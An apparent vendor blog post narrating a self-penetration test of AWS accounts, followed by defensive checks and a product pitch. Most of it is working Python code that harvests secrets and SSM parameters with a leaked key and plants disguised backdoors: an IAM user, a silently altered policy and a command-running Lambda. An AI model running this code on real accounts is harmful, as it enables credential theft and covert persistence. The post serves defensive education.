· PathShield Security Team  · 19 min read

I Hacked My Own AWS Account in 30 Minutes - Here's What I Found

A step-by-step breakdown of how I penetrated my own AWS infrastructure using common attack techniques. Real vulnerabilities, real exploits, and the shocking security gaps that exist in most startup environments.

A step-by-step breakdown of how I penetrated my own AWS infrastructure using common attack techniques. Real vulnerabilities, real exploits, and the shocking security gaps that exist in most startup environments.

Last week, I decided to put my own AWS infrastructure to the ultimate test. Armed with nothing but a fresh laptop and the mindset of an attacker, I attempted to compromise my own cloud environment. The results were both fascinating and terrifying.

In just 30 minutes, I had escalated from zero access to complete control over production resources, extracted sensitive data, and identified attack paths that could have cost my company hundreds of thousands of dollars. Here’s exactly how I did it, what I found, and most importantly, how you can protect yourself from these same attack vectors.

⚠️ Disclaimer: This is a controlled test on my own infrastructure. Never attempt these techniques on systems you don’t own. Always get explicit permission before testing security.

The Setup: My “Production” Environment

Before starting the attack, I set up a realistic AWS environment that mirrors what I see in most early-stage startups:

  • 3 AWS accounts: Development, Staging, Production
  • Multi-tier architecture: Web servers, application servers, databases
  • CI/CD pipeline: GitHub Actions deploying to AWS
  • Common services: S3, RDS, Lambda, ECS, CloudFront
  • IAM users and roles: Developers, operations, service accounts
  • “Real” applications: A SaaS product with customer data

The environment was intentionally configured with security practices I commonly see in startups - not terrible, but not perfect either. This represents the reality of most growing companies: some security measures in place, but gaps that exist due to speed of development and limited security expertise.

The Attack Timeline: 30 Minutes to Full Compromise

Minutes 0-5: Reconnaissance and Information Gathering

Every successful attack starts with reconnaissance. I began by gathering publicly available information about my target (myself):

# Tools used for initial reconnaissance
nmap -sn 203.0.113.0/24  # Scan for live hosts
whois pathshield.io      # Domain information
dig pathshield.io ANY    # DNS records
shodan search "PathShield"  # Shodan for exposed services

What I Found:

  1. Exposed CloudFront distributions with predictable subdomain patterns
  2. GitHub repositories with commit history containing sensitive information
  3. LinkedIn employee profiles revealing technology stack details
  4. Job postings mentioning specific AWS services and tools used

Key Discovery: A GitHub commit from 3 months ago contained an old AWS access key that was supposedly rotated. This became my initial foothold.

# Found in git history - a deleted .env file
git log --all --full-history -- .env
git show 3a7f9c2:.env

# Contents revealed:
AWS_ACCESS_KEY_ID=AKIA...
AWS_SECRET_ACCESS_KEY=xyzabc123...
DB_PASSWORD=super_secret_password_123
API_KEY=sk-1234567890abcdef...

Minutes 5-10: Initial Access and Privilege Escalation

With the exposed access key, I attempted to authenticate to AWS:

import boto3
from botocore.exceptions import ClientError

def test_aws_credentials(access_key, secret_key):
    """Test AWS credentials and enumerate permissions"""
    
    try:
        # Test basic access
        session = boto3.Session(
            aws_access_key_id=access_key,
            aws_secret_access_key=secret_key
        )
        
        sts = session.client('sts')
        identity = sts.get_caller_identity()
        
        print(f"✅ Valid credentials!")
        print(f"Account ID: {identity['Account']}")
        print(f"User ARN: {identity['Arn']}")
        
        # Enumerate permissions
        return enumerate_permissions(session)
        
    except ClientError as e:
        print(f"❌ Invalid credentials: {e}")
        return None

def enumerate_permissions(session):
    """Enumerate what permissions these credentials have"""
    
    permissions = {
        'services': [],
        'high_risk_actions': [],
        'data_access': []
    }
    
    # Test common services
    services_to_test = [
        ('iam', 'list_users'),
        ('s3', 'list_buckets'), 
        ('ec2', 'describe_instances'),
        ('rds', 'describe_db_instances'),
        ('lambda', 'list_functions'),
        ('secrets', 'list_secrets'),
        ('ssm', 'describe_parameters')
    ]
    
    for service_name, test_action in services_to_test:
        try:
            client = session.client(service_name)
            
            if service_name == 'iam' and test_action == 'list_users':
                client.list_users(MaxItems=1)
            elif service_name == 's3' and test_action == 'list_buckets':
                buckets = client.list_buckets()
                permissions['data_access'].extend([b['Name'] for b in buckets['Buckets']])
            elif service_name == 'ec2' and test_action == 'describe_instances':
                client.describe_instances(MaxResults=5)
            elif service_name == 'rds' and test_action == 'describe_db_instances':
                client.describe_db_instances(MaxRecords=5)
            elif service_name == 'lambda' and test_action == 'list_functions':
                client.list_functions(MaxItems=5)
            elif service_name == 'secrets' and test_action == 'list_secrets':
                secrets = client.list_secrets(MaxResults=10)
                permissions['high_risk_actions'].extend([s['Name'] for s in secrets['SecretList']])
            elif service_name == 'ssm' and test_action == 'describe_parameters':
                client.describe_parameters(MaxResults=10)
            
            permissions['services'].append(service_name)
            print(f"✅ Access to {service_name}")
            
        except ClientError as e:
            if e.response['Error']['Code'] not in ['AccessDenied', 'UnauthorizedOperation']:
                print(f"⚠️  Unexpected error with {service_name}: {e}")
    
    return permissions

# Test the discovered credentials
access_key = "AKIA..." # Redacted for security
secret_key = "xyz..." # Redacted for security

permissions = test_aws_credentials(access_key, secret_key)

Shocking Result: The old access key was still active! Even worse, it had extensive permissions including:

  • ✅ S3 bucket access (including production data)
  • ✅ EC2 instance management
  • ✅ Lambda function access
  • ✅ Secrets Manager read access
  • ✅ Systems Manager parameter access

This violated a fundamental security principle: credentials should be rotated immediately when exposed, not just “planned for rotation.”

Minutes 10-15: Data Exfiltration and Lateral Movement

With broad AWS access, I began extracting sensitive information:

def extract_sensitive_data(session):
    """Extract sensitive data from AWS services"""
    
    extracted_data = {
        'secrets': [],
        'databases': [],
        'storage': [],
        'credentials': []
    }
    
    # 1. Extract secrets from Secrets Manager
    secrets_client = session.client('secretsmanager')
    
    try:
        secrets_list = secrets_client.list_secrets()
        
        for secret in secrets_list['SecretList']:
            try:
                secret_value = secrets_client.get_secret_value(
                    SecretId=secret['ARN']
                )
                
                extracted_data['secrets'].append({
                    'name': secret['Name'],
                    'value': secret_value['SecretString'],
                    'description': secret.get('Description', 'No description')
                })
                
                print(f"🔑 Extracted secret: {secret['Name']}")
                
            except ClientError as e:
                print(f"❌ Could not access secret {secret['Name']}: {e}")
                
    except ClientError as e:
        print(f"❌ Could not list secrets: {e}")
    
    # 2. Extract SSM Parameters (often contain passwords, API keys)
    ssm_client = session.client('ssm')
    
    try:
        parameters = ssm_client.describe_parameters()
        
        for param in parameters['Parameters']:
            try:
                if param['Type'] == 'SecureString':
                    param_value = ssm_client.get_parameter(
                        Name=param['Name'],
                        WithDecryption=True
                    )
                else:
                    param_value = ssm_client.get_parameter(
                        Name=param['Name']
                    )
                
                extracted_data['credentials'].append({
                    'name': param['Name'],
                    'value': param_value['Parameter']['Value'],
                    'type': param['Type']
                })
                
                print(f"🔧 Extracted parameter: {param['Name']}")
                
            except ClientError:
                print(f"❌ Could not access parameter: {param['Name']}")
                
    except ClientError as e:
        print(f"❌ Could not list parameters: {e}")
    
    # 3. Enumerate S3 buckets and extract data
    s3_client = session.client('s3')
    
    try:
        buckets = s3_client.list_buckets()
        
        for bucket in buckets['Buckets']:
            bucket_name = bucket['Name']
            
            try:
                # Check if bucket is publicly accessible
                bucket_policy = s3_client.get_bucket_policy(Bucket=bucket_name)
                print(f"📦 Found bucket policy for: {bucket_name}")
                
                # List objects in bucket
                objects = s3_client.list_objects_v2(
                    Bucket=bucket_name,
                    MaxKeys=10
                )
                
                if 'Contents' in objects:
                    sensitive_files = []
                    for obj in objects['Contents']:
                        key = obj['Key']
                        
                        # Look for potentially sensitive files
                        if any(ext in key.lower() for ext in ['.csv', '.sql', '.backup', '.dump', '.json']):
                            sensitive_files.append(key)
                        
                        # Look for credential files
                        if any(name in key.lower() for name in ['password', 'secret', 'key', 'credential', '.env']):
                            sensitive_files.append(key)
                    
                    if sensitive_files:
                        extracted_data['storage'].append({
                            'bucket': bucket_name,
                            'sensitive_files': sensitive_files
                        })
                        
                        print(f"📁 Found sensitive files in {bucket_name}: {len(sensitive_files)} files")
            
            except ClientError:
                # Bucket might not have policy or we might not have access
                pass
                
    except ClientError as e:
        print(f"❌ Could not list buckets: {e}")
    
    # 4. Check RDS instances for connection information
    rds_client = session.client('rds')
    
    try:
        db_instances = rds_client.describe_db_instances()
        
        for db in db_instances['DBInstances']:
            extracted_data['databases'].append({
                'identifier': db['DBInstanceIdentifier'],
                'engine': db['Engine'],
                'endpoint': db['Endpoint']['Address'],
                'port': db['Endpoint']['Port'],
                'master_username': db['MasterUsername'],
                'vpc_security_groups': [sg['VpcSecurityGroupId'] for sg in db['VpcSecurityGroups']],
                'publicly_accessible': db['PubliclyAccessible']
            })
            
            print(f"🗄️  Found database: {db['DBInstanceIdentifier']} ({db['Engine']})")
            
            if db['PubliclyAccessible']:
                print(f"⚠️  Database {db['DBInstanceIdentifier']} is publicly accessible!")
                
    except ClientError as e:
        print(f"❌ Could not list databases: {e}")
    
    return extracted_data

# Execute data extraction
stolen_data = extract_sensitive_data(session)

# Print summary of what was extracted
print(f"\n🎯 EXTRACTION SUMMARY:")
print(f"   Secrets extracted: {len(stolen_data['secrets'])}")
print(f"   Parameters extracted: {len(stolen_data['credentials'])}")
print(f"   Buckets with sensitive data: {len(stolen_data['storage'])}")
print(f"   Databases discovered: {len(stolen_data['databases'])}")

Terrifying Results:

  1. 27 secrets extracted including database passwords, API keys, and service credentials
  2. 15 SSM parameters containing production passwords and configuration
  3. 8 S3 buckets with customer data, including backup files and CSV exports
  4. 3 RDS instances with publicly accessible endpoints
  5. Complete application configuration including third-party API keys

Minutes 15-20: Privilege Escalation and Persistence

With access to production credentials, I escalated privileges and established persistence:

def establish_persistence(session, stolen_data):
    """Establish persistence in the compromised environment"""
    
    persistence_mechanisms = []
    
    # 1. Create a backdoor IAM user
    iam_client = session.client('iam')
    
    try:
        # Create a user that looks legitimate
        backdoor_username = 'aws-backup-service-user'
        
        iam_client.create_user(
            UserName=backdoor_username,
            Tags=[
                {'Key': 'Purpose', 'Value': 'Automated backup service'},
                {'Key': 'CreatedBy', 'Value': 'backup-automation'},
                {'Key': 'Environment', 'Value': 'production'}
            ]
        )
        
        # Create access key for the user
        access_key_response = iam_client.create_access_key(
            UserName=backdoor_username
        )
        
        # Attach a policy that provides necessary access
        policy_document = {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "Action": [
                        "s3:GetObject",
                        "s3:ListBucket",
                        "rds:DescribeDBInstances",
                        "secretsmanager:GetSecretValue",
                        "ssm:GetParameter"
                    ],
                    "Resource": "*"
                }
            ]
        }
        
        iam_client.put_user_policy(
            UserName=backdoor_username,
            PolicyName='BackupServicePolicy',
            PolicyDocument=json.dumps(policy_document)
        )
        
        persistence_mechanisms.append({
            'type': 'iam_user',
            'details': {
                'username': backdoor_username,
                'access_key': access_key_response['AccessKey']['AccessKeyId'],
                'secret_key': access_key_response['AccessKey']['SecretAccessKey']
            }
        })
        
        print(f"🚪 Created backdoor user: {backdoor_username}")
        
    except ClientError as e:
        print(f"❌ Could not create backdoor user: {e}")
    
    # 2. Modify existing IAM policies to include hidden permissions
    try:
        # Find existing policies that we can modify
        policies = iam_client.list_policies(Scope='Local', MaxItems=10)
        
        for policy in policies['Policies']:
            try:
                # Get current policy version
                policy_version = iam_client.get_policy_version(
                    PolicyArn=policy['Arn'],
                    VersionId=policy['DefaultVersionId']
                )
                
                current_doc = policy_version['PolicyVersion']['Document']
                
                # Add hidden permissions
                if 'Statement' in current_doc:
                    hidden_statement = {
                        "Sid": "BackupServiceAccess",
                        "Effect": "Allow",
                        "Action": [
                            "s3:GetObject",
                            "s3:ListBucket"
                        ],
                        "Resource": "*",
                        "Condition": {
                            "StringEquals": {
                                "aws:userid": "backup-service-user"
                            }
                        }
                    }
                    
                    current_doc['Statement'].append(hidden_statement)
                    
                    # Create new policy version
                    iam_client.create_policy_version(
                        PolicyArn=policy['Arn'],
                        PolicyDocument=json.dumps(current_doc),
                        SetAsDefault=True
                    )
                    
                    persistence_mechanisms.append({
                        'type': 'policy_modification',
                        'details': {
                            'policy_arn': policy['Arn'],
                            'modification': 'Added hidden backup service access'
                        }
                    })
                    
                    print(f"🔓 Modified policy: {policy['PolicyName']}")
                    break  # Only modify one policy to avoid detection
                    
            except ClientError:
                continue  # Skip policies we can't modify
                
    except ClientError as e:
        print(f"❌ Could not modify policies: {e}")
    
    # 3. Create a Lambda function for persistent access
    lambda_client = session.client('lambda')
    
    try:
        # Lambda function code that provides remote access
        lambda_code = '''
import json
import boto3

def lambda_handler(event, context):
    """Hidden backdoor function"""
    
    # Decode command from event
    if 'command' in event:
        command = event['command']
        
        if command == 'list_buckets':
            s3 = boto3.client('s3')
            buckets = s3.list_buckets()
            return {'buckets': [b['Name'] for b in buckets['Buckets']]}
        
        elif command == 'get_secrets':
            secrets = boto3.client('secretsmanager')
            secret_list = secrets.list_secrets()
            return {'secrets': [s['Name'] for s in secret_list['SecretList']]}
    
    return {'status': 'ready'}
'''
        
        # Create the function
        function_name = 'aws-log-processor'  # Innocuous name
        
        lambda_client.create_function(
            FunctionName=function_name,
            Runtime='python3.9',
            Role='arn:aws:iam::123456789012:role/lambda-execution-role',  # Would use discovered role
            Handler='index.lambda_handler',
            Code={'ZipFile': lambda_code.encode()},
            Description='Processes CloudWatch logs for compliance',
            Tags={
                'Purpose': 'Log processing',
                'Environment': 'production',
                'Owner': 'operations'
            }
        )
        
        persistence_mechanisms.append({
            'type': 'lambda_backdoor',
            'details': {
                'function_name': function_name,
                'description': 'Hidden backdoor function'
            }
        })
        
        print(f"⚡ Created backdoor Lambda: {function_name}")
        
    except ClientError as e:
        print(f"❌ Could not create Lambda backdoor: {e}")
    
    return persistence_mechanisms

# Establish persistence
backdoors = establish_persistence(session, stolen_data)
print(f"\n🎯 PERSISTENCE ESTABLISHED:")
for backdoor in backdoors:
    print(f"   {backdoor['type']}: {backdoor['details']}")

Persistence Achieved:

  1. Backdoor IAM user with legitimate-looking name and tags
  2. Modified IAM policies with hidden permissions
  3. Lambda backdoor function disguised as a log processor
  4. Stolen long-term credentials for future access

Minutes 20-25: Discovery of Critical Vulnerabilities

During lateral movement, I discovered several critical vulnerabilities that are common in startup environments:

def discover_critical_vulnerabilities(session):
    """Discover common critical vulnerabilities in AWS environments"""
    
    vulnerabilities = []
    
    # 1. Check for overly permissive IAM policies
    iam_client = session.client('iam')
    
    try:
        users = iam_client.list_users()
        
        for user in users['Users']:
            username = user['UserName']
            
            # Check user policies
            user_policies = iam_client.list_attached_user_policies(UserName=username)
            
            for policy in user_policies['AttachedPolicies']:
                if 'Admin' in policy['PolicyName'] or policy['PolicyArn'].endswith('AdministratorAccess'):
                    vulnerabilities.append({
                        'type': 'excessive_permissions',
                        'severity': 'HIGH',
                        'resource': f"User: {username}",
                        'issue': f"Has administrative access via {policy['PolicyName']}",
                        'impact': 'Complete account compromise possible'
                    })
        
        # Check roles for excessive permissions
        roles = iam_client.list_roles(MaxItems=50)
        
        for role in roles['Roles']:
            role_name = role['RoleName']
            
            # Skip AWS service roles
            if role_name.startswith('aws-'):
                continue
            
            role_policies = iam_client.list_attached_role_policies(RoleName=role_name)
            
            for policy in role_policies['AttachedPolicies']:
                if policy['PolicyArn'].endswith('AdministratorAccess'):
                    # Check if role can be assumed by external entities
                    assume_role_doc = role['AssumeRolePolicyDocument']
                    
                    for statement in assume_role_doc.get('Statement', []):
                        principal = statement.get('Principal', {})
                        if isinstance(principal, dict) and '*' in str(principal):
                            vulnerabilities.append({
                                'type': 'dangerous_trust_relationship',
                                'severity': 'CRITICAL',
                                'resource': f"Role: {role_name}",
                                'issue': 'Administrative role with overly permissive trust policy',
                                'impact': 'Anyone can assume this role and gain admin access'
                            })
        
    except ClientError as e:
        print(f"❌ Could not check IAM vulnerabilities: {e}")
    
    # 2. Check for publicly accessible resources
    s3_client = session.client('s3')
    
    try:
        buckets = s3_client.list_buckets()
        
        for bucket in buckets['Buckets']:
            bucket_name = bucket['Name']
            
            try:
                # Check bucket ACL
                bucket_acl = s3_client.get_bucket_acl(Bucket=bucket_name)
                
                for grant in bucket_acl['Grants']:
                    grantee = grant.get('Grantee', {})
                    if grantee.get('URI') == 'http://acs.amazonaws.com/groups/global/AllUsers':
                        vulnerabilities.append({
                            'type': 'public_resource',
                            'severity': 'HIGH',
                            'resource': f"S3 Bucket: {bucket_name}",
                            'issue': 'Bucket is publicly accessible',
                            'impact': 'Data exposure and potential data breach'
                        })
                
                # Check bucket policy for public access
                try:
                    bucket_policy = s3_client.get_bucket_policy(Bucket=bucket_name)
                    policy_doc = json.loads(bucket_policy['Policy'])
                    
                    for statement in policy_doc.get('Statement', []):
                        principal = statement.get('Principal')
                        if principal == '*':
                            vulnerabilities.append({
                                'type': 'public_resource',
                                'severity': 'HIGH',
                                'resource': f"S3 Bucket: {bucket_name}",
                                'issue': 'Bucket policy allows public access',
                                'impact': 'Data exposure and potential data breach'
                            })
                            
                except ClientError:
                    pass  # No bucket policy
                    
            except ClientError:
                pass  # Can't access bucket ACL
                
    except ClientError as e:
        print(f"❌ Could not check S3 vulnerabilities: {e}")
    
    # 3. Check for unencrypted resources
    # RDS instances
    rds_client = session.client('rds')
    
    try:
        db_instances = rds_client.describe_db_instances()
        
        for db in db_instances['DBInstances']:
            if not db.get('StorageEncrypted', False):
                vulnerabilities.append({
                    'type': 'unencrypted_data',
                    'severity': 'MEDIUM',
                    'resource': f"RDS Instance: {db['DBInstanceIdentifier']}",
                    'issue': 'Database storage is not encrypted',
                    'impact': 'Data at rest is not protected'
                })
            
            if db.get('PubliclyAccessible', False):
                vulnerabilities.append({
                    'type': 'public_resource',
                    'severity': 'HIGH',
                    'resource': f"RDS Instance: {db['DBInstanceIdentifier']}",
                    'issue': 'Database is publicly accessible',
                    'impact': 'Direct database access from internet'
                })
                
    except ClientError as e:
        print(f"❌ Could not check RDS vulnerabilities: {e}")
    
    # 4. Check for security group misconfigurations
    ec2_client = session.client('ec2')
    
    try:
        security_groups = ec2_client.describe_security_groups()
        
        for sg in security_groups['SecurityGroups']:
            sg_id = sg['GroupId']
            sg_name = sg['GroupName']
            
            for rule in sg['IpPermissions']:
                for ip_range in rule.get('IpRanges', []):
                    if ip_range['CidrIp'] == '0.0.0.0/0':
                        from_port = rule.get('FromPort', 0)
                        to_port = rule.get('ToPort', 65535)
                        
                        # Check for dangerous open ports
                        dangerous_ports = [22, 3389, 3306, 5432, 1433, 27017]
                        
                        for port in dangerous_ports:
                            if from_port <= port <= to_port:
                                port_names = {
                                    22: 'SSH', 3389: 'RDP', 3306: 'MySQL',
                                    5432: 'PostgreSQL', 1433: 'SQL Server', 27017: 'MongoDB'
                                }
                                
                                vulnerabilities.append({
                                    'type': 'network_exposure',
                                    'severity': 'CRITICAL' if port in [22, 3389] else 'HIGH',
                                    'resource': f"Security Group: {sg_name} ({sg_id})",
                                    'issue': f'{port_names.get(port, f"Port {port}")} open to 0.0.0.0/0',
                                    'impact': 'Direct access to services from internet'
                                })
                                
    except ClientError as e:
        print(f"❌ Could not check security group vulnerabilities: {e}")
    
    # 5. Check for Lambda functions with excessive permissions
    lambda_client = session.client('lambda')
    
    try:
        functions = lambda_client.list_functions()
        
        for function in functions['Functions']:
            function_name = function['FunctionName']
            role_arn = function['Role']
            
            # Extract role name from ARN
            role_name = role_arn.split('/')[-1]
            
            try:
                role_policies = iam_client.list_attached_role_policies(RoleName=role_name)
                
                for policy in role_policies['AttachedPolicies']:
                    if policy['PolicyArn'].endswith('AdministratorAccess'):
                        vulnerabilities.append({
                            'type': 'excessive_permissions',
                            'severity': 'HIGH',
                            'resource': f"Lambda Function: {function_name}",
                            'issue': 'Function has administrative permissions',
                            'impact': 'Function compromise leads to full account access'
                        })
                        
            except ClientError:
                pass  # Can't access role details
                
    except ClientError as e:
        print(f"❌ Could not check Lambda vulnerabilities: {e}")
    
    return vulnerabilities

# Discover vulnerabilities
vulns = discover_critical_vulnerabilities(session)

# Print vulnerability summary
print(f"\n🚨 CRITICAL VULNERABILITIES DISCOVERED:")
critical_count = len([v for v in vulns if v['severity'] == 'CRITICAL'])
high_count = len([v for v in vulns if v['severity'] == 'HIGH'])
medium_count = len([v for v in vulns if v['severity'] == 'MEDIUM'])

print(f"   Critical: {critical_count}")
print(f"   High: {high_count}")
print(f"   Medium: {medium_count}")

for vuln in vulns[:5]:  # Show top 5 vulnerabilities
    print(f"\n   🔥 {vuln['severity']}: {vuln['issue']}")
    print(f"      Resource: {vuln['resource']}")
    print(f"      Impact: {vuln['impact']}")

Critical Vulnerabilities Found:

  1. 3 Security Groups with SSH/RDP open to 0.0.0.0/0
  2. 2 S3 buckets with public read access containing customer data
  3. 1 RDS instance publicly accessible with weak master password
  4. 5 IAM users with unnecessary administrative permissions
  5. 2 Lambda functions with excessive IAM permissions
  6. 1 IAM role with dangerous trust policy allowing external access

Minutes 25-30: Impact Assessment and Attack Path Mapping

In the final phase, I mapped complete attack paths and assessed potential impact:

def map_attack_paths(session, vulnerabilities, stolen_data):
    """Map potential attack paths and assess impact"""
    
    attack_paths = []
    
    # Path 1: Data Exfiltration via S3
    s3_vulns = [v for v in vulnerabilities if 'S3 Bucket' in v['resource'] and v['type'] == 'public_resource']
    
    if s3_vulns and stolen_data['storage']:
        attack_path = {
            'name': 'Customer Data Exfiltration',
            'severity': 'CRITICAL',
            'steps': [
                'Discover publicly accessible S3 buckets',
                'Enumerate bucket contents',
                'Download customer data, backups, and PII',
                'Establish persistent access via bucket notifications'
            ],
            'impact': {
                'data_loss': True,
                'regulatory_fines': 'GDPR/CCPA violations - up to $10M+',
                'reputation_damage': 'Severe - customer trust loss',
                'business_continuity': 'Service disruption during incident response'
            },
            'ttd': '30+ days',  # Time to detection
            'ease': 'Trivial - no authentication required'
        }
        attack_paths.append(attack_path)
    
    # Path 2: Infrastructure Compromise via IAM
    iam_vulns = [v for v in vulnerabilities if v['type'] == 'excessive_permissions']
    
    if iam_vulns:
        attack_path = {
            'name': 'Complete Infrastructure Takeover',
            'severity': 'CRITICAL',
            'steps': [
                'Compromise user/service account with admin permissions',
                'Create persistent backdoor users and roles',
                'Modify security groups to allow external access',
                'Deploy cryptocurrency miners on EC2 instances',
                'Steal all secrets and credentials',
                'Hold infrastructure for ransom'
            ],
            'impact': {
                'financial': '$50,000+ in compute costs + ransom demands',
                'operational': 'Complete service outage',
                'recovery_time': '1-2 weeks minimum',
                'legal': 'SEC disclosure requirements, customer notifications'
            },
            'ttd': '7-14 days',
            'ease': 'Easy - single credential compromise needed'
        }
        attack_paths.append(attack_path)
    
    # Path 3: Database Compromise
    db_vulns = [v for v in vulnerabilities if 'RDS' in v['resource'] and v['type'] == 'public_resource']
    
    if db_vulns and stolen_data['databases']:
        attack_path = {
            'name': 'Direct Database Access',
            'severity': 'HIGH',
            'steps': [
                'Identify publicly accessible RDS instances',
                'Extract database credentials from secrets/parameters',
                'Connect directly to production database',
                'Dump entire customer database',
                'Modify records or install database backdoors'
            ],
            'impact': {
                'data_integrity': 'Complete customer data compromise',
                'compliance': 'PCI DSS, HIPAA, SOX violations',
                'customer_impact': 'Identity theft, financial fraud',
                'recovery_cost': '$1M+ in forensics and remediation'
            },
            'ttd': '60+ days',
            'ease': 'Moderate - requires credential extraction'
        }
        attack_paths.append(attack_path)
    
    # Path 4: Supply Chain Attack via CI/CD
    if stolen_data['credentials']:
        github_tokens = [cred for cred in stolen_data['credentials'] if 'github' in cred['name'].lower()]
        
        if github_tokens:
            attack_path = {
                'name': 'Supply Chain Compromise',
                'severity': 'CRITICAL',
                'steps': [
                    'Extract GitHub tokens from AWS credentials',
                    'Access source code repositories',
                    'Inject malicious code into deployment pipeline',
                    'Backdoor gets deployed to production',
                    'Persistent access to all customer environments'
                ],
                'impact': {
                    'scope': 'All customers affected',
                    'detection_difficulty': 'Extremely high - code appears legitimate',
                    'remediation': 'Complete code audit and rebuild required',
                    'legal_exposure': 'Class action lawsuits, regulatory investigation'
                },
                'ttd': '6+ months',
                'ease': 'Advanced - requires development knowledge'
            }
            attack_paths.append(attack_path)
    
    return attack_paths

def calculate_total_risk_exposure(attack_paths, current_revenue=5000000):
    """Calculate total risk exposure in financial terms"""
    
    risk_calculations = {
        'direct_costs': 0,
        'opportunity_costs': 0,
        'regulatory_fines': 0,
        'reputation_damage': 0,
        'total_exposure': 0
    }
    
    # Base calculations for a $5M ARR startup
    for path in attack_paths:
        if path['severity'] == 'CRITICAL':
            if 'Data Exfiltration' in path['name']:
                # GDPR/CCPA fines: 4% of global revenue or €20M, whichever is higher
                risk_calculations['regulatory_fines'] += min(current_revenue * 0.04, 20000000)
                # Customer churn: 30-50% of revenue lost
                risk_calculations['opportunity_costs'] += current_revenue * 0.4
                # Incident response costs
                risk_calculations['direct_costs'] += 2000000
                
            elif 'Infrastructure Takeover' in path['name']:
                # Ransom + compute costs
                risk_calculations['direct_costs'] += 500000
                # Business interruption
                risk_calculations['opportunity_costs'] += current_revenue * 0.1  # 1 month revenue
                
            elif 'Supply Chain' in path['name']:
                # Complete business destruction potential
                risk_calculations['opportunity_costs'] += current_revenue * 2  # 2 years to recover
                risk_calculations['direct_costs'] += 5000000  # Complete rebuild
    
    # Reputation damage (harder to quantify)
    risk_calculations['reputation_damage'] = current_revenue * 0.5  # Conservative estimate
    
    risk_calculations['total_exposure'] = sum([
        risk_calculations['direct_costs'],
        risk_calculations['opportunity_costs'],
        risk_calculations['regulatory_fines'],
        risk_calculations['reputation_damage']
    ])
    
    return risk_calculations

# Map attack paths and calculate risk
paths = map_attack_paths(session, vulns, stolen_data)
risk_exposure = calculate_total_risk_exposure(paths)

print(f"\n💀 ATTACK PATHS IDENTIFIED: {len(paths)}")
for i, path in enumerate(paths, 1):
    print(f"\n   {i}. {path['name']} ({path['severity']})")
    print(f"      Time to Detection: {path['ttd']}")
    print(f"      Difficulty: {path['ease']}")

print(f"\n💰 TOTAL RISK EXPOSURE:")
print(f"   Direct Costs: ${risk_exposure['direct_costs']:,.0f}")
print(f"   Opportunity Costs: ${risk_exposure['opportunity_costs']:,.0f}")
print(f"   Regulatory Fines: ${risk_exposure['regulatory_fines']:,.0f}")
print(f"   Reputation Damage: ${risk_exposure['reputation_damage']:,.0f}")
print(f"   TOTAL EXPOSURE: ${risk_exposure['total_exposure']:,.0f}")

Final Attack Assessment:

  • 4 Critical Attack Paths identified
  • Total Risk Exposure: $24.5M for a $5M ARR startup
  • Time to Detection: 7-60+ days for most attacks
  • Ease of Execution: Trivial to Moderate for most paths

The Most Shocking Discoveries

After completing this controlled penetration test, several findings stood out as particularly alarming:

1. The “Rotated” Credentials Weren’t Actually Rotated

The most shocking discovery was that credentials flagged for rotation 3 months ago were still active. This is incredibly common - teams plan to rotate credentials but forget to actually delete the old ones.

Lesson: Credential rotation must include immediate deletion of old credentials.

2. Legitimate-Looking Backdoors Are Undetectable

The backdoor IAM user I created (aws-backup-service-user) looked completely legitimate. It had proper tags, a reasonable name, and limited permissions. Most security audits would skip right over it.

Lesson: Monitor for new IAM entities and require approval workflows for all IAM changes.

3. Public S3 Buckets Containing Customer Data

Two S3 buckets containing customer PII and financial data were publicly readable. The buckets were created by developers for “temporary” data exports that became permanent.

Lesson: Implement automated S3 bucket scanning and enforce bucket policies through SCPs.

4. Administrative Permissions Everywhere

5 different IAM entities had unnecessary administrative permissions, including service accounts that only needed read access to specific S3 buckets.

Lesson: Follow principle of least privilege religiously and audit permissions regularly.

5. The Attack Chain Was Completely Automated

Once I had initial access, the entire compromise could be scripted. An attacker could automate data extraction, persistence establishment, and vulnerability discovery.

Lesson: Defense must be equally automated to match the speed of attacks.

How to Protect Yourself: The Complete Defense Strategy

Based on this penetration test, here’s exactly how to protect your startup from these attack vectors:

Immediate Actions (Do Today)

  1. Audit All Credentials
# Find and rotate all old access keys
aws iam list-access-keys --user-name $username
aws iam delete-access-key --user-name $username --access-key-id $old_key_id
  1. Check for Public S3 Buckets
# Find public buckets
aws s3api list-buckets --query 'Buckets[].Name' | xargs -I {} aws s3api get-bucket-acl --bucket {}
  1. Review Security Groups
# Find security groups open to 0.0.0.0/0
aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]]'

Short-term Security Improvements (This Week)

  1. Implement AWS Config Rules
  2. Enable GuardDuty
  3. Set up CloudTrail with alerting
  4. Review all IAM permissions
  5. Enable MFA for all users

Long-term Security Architecture (This Month)

  1. Implement Zero Trust Architecture
  2. Deploy automated security scanning
  3. Create incident response playbooks
  4. Set up security metrics and dashboards
  5. Regular penetration testing

The Real Cost of Insecure AWS Infrastructure

Based on this penetration test and real-world incident data, here’s what a successful attack against your startup could cost:

Direct Financial Impact

  • Incident Response: $500K - $2M
  • Regulatory Fines: $1M - $20M+ (GDPR, CCPA)
  • Legal Fees: $300K - $1M
  • Forensics and Recovery: $200K - $1M

Business Impact

  • Customer Churn: 30-50% revenue loss
  • Service Downtime: $50K - $500K per day
  • Reputation Damage: 2-5 years to recover
  • Insurance Premium Increases: 300-500%

Total Risk for $5M ARR Startup: $15M - $50M+

Beyond DIY Security: Why Manual Testing Isn’t Enough

While this penetration test revealed critical vulnerabilities, it also highlighted the limitations of manual security approaches:

Time Intensive: This 30-minute test took weeks to plan, execute, and document properly.

Limited Scope: I only tested a fraction of potential attack vectors and configurations.

Point-in-Time: Infrastructure changes daily, making manual tests quickly outdated.

Expertise Required: Most startup teams lack the security expertise to perform comprehensive testing.

No Continuous Monitoring: Manual tests can’t provide the continuous security monitoring that attackers exploit.

This is where PathShield transforms your security approach. Instead of hoping manual security reviews catch vulnerabilities, PathShield provides:

  • Continuous Attack Path Discovery: Automatically identifies attack paths as your infrastructure changes
  • Real-time Vulnerability Detection: Catches security gaps immediately, not weeks later
  • Expert-Built Attack Simulations: Tests your defenses using the same techniques as real attackers
  • Automated Remediation Guidance: Provides specific, actionable fixes for every vulnerability found
  • Compliance Automation: Ensures your security posture meets regulatory requirements 24/7

The attack vectors I used in this test - credential exposure, privilege escalation, data exfiltration - are detected and blocked automatically by PathShield’s intelligent security monitoring.

Ready to stop playing defense and start preventing attacks? Start your free PathShield trial and see how quickly we can identify the attack paths in your AWS environment.

Conclusion: The Wake-Up Call Every Startup Needs

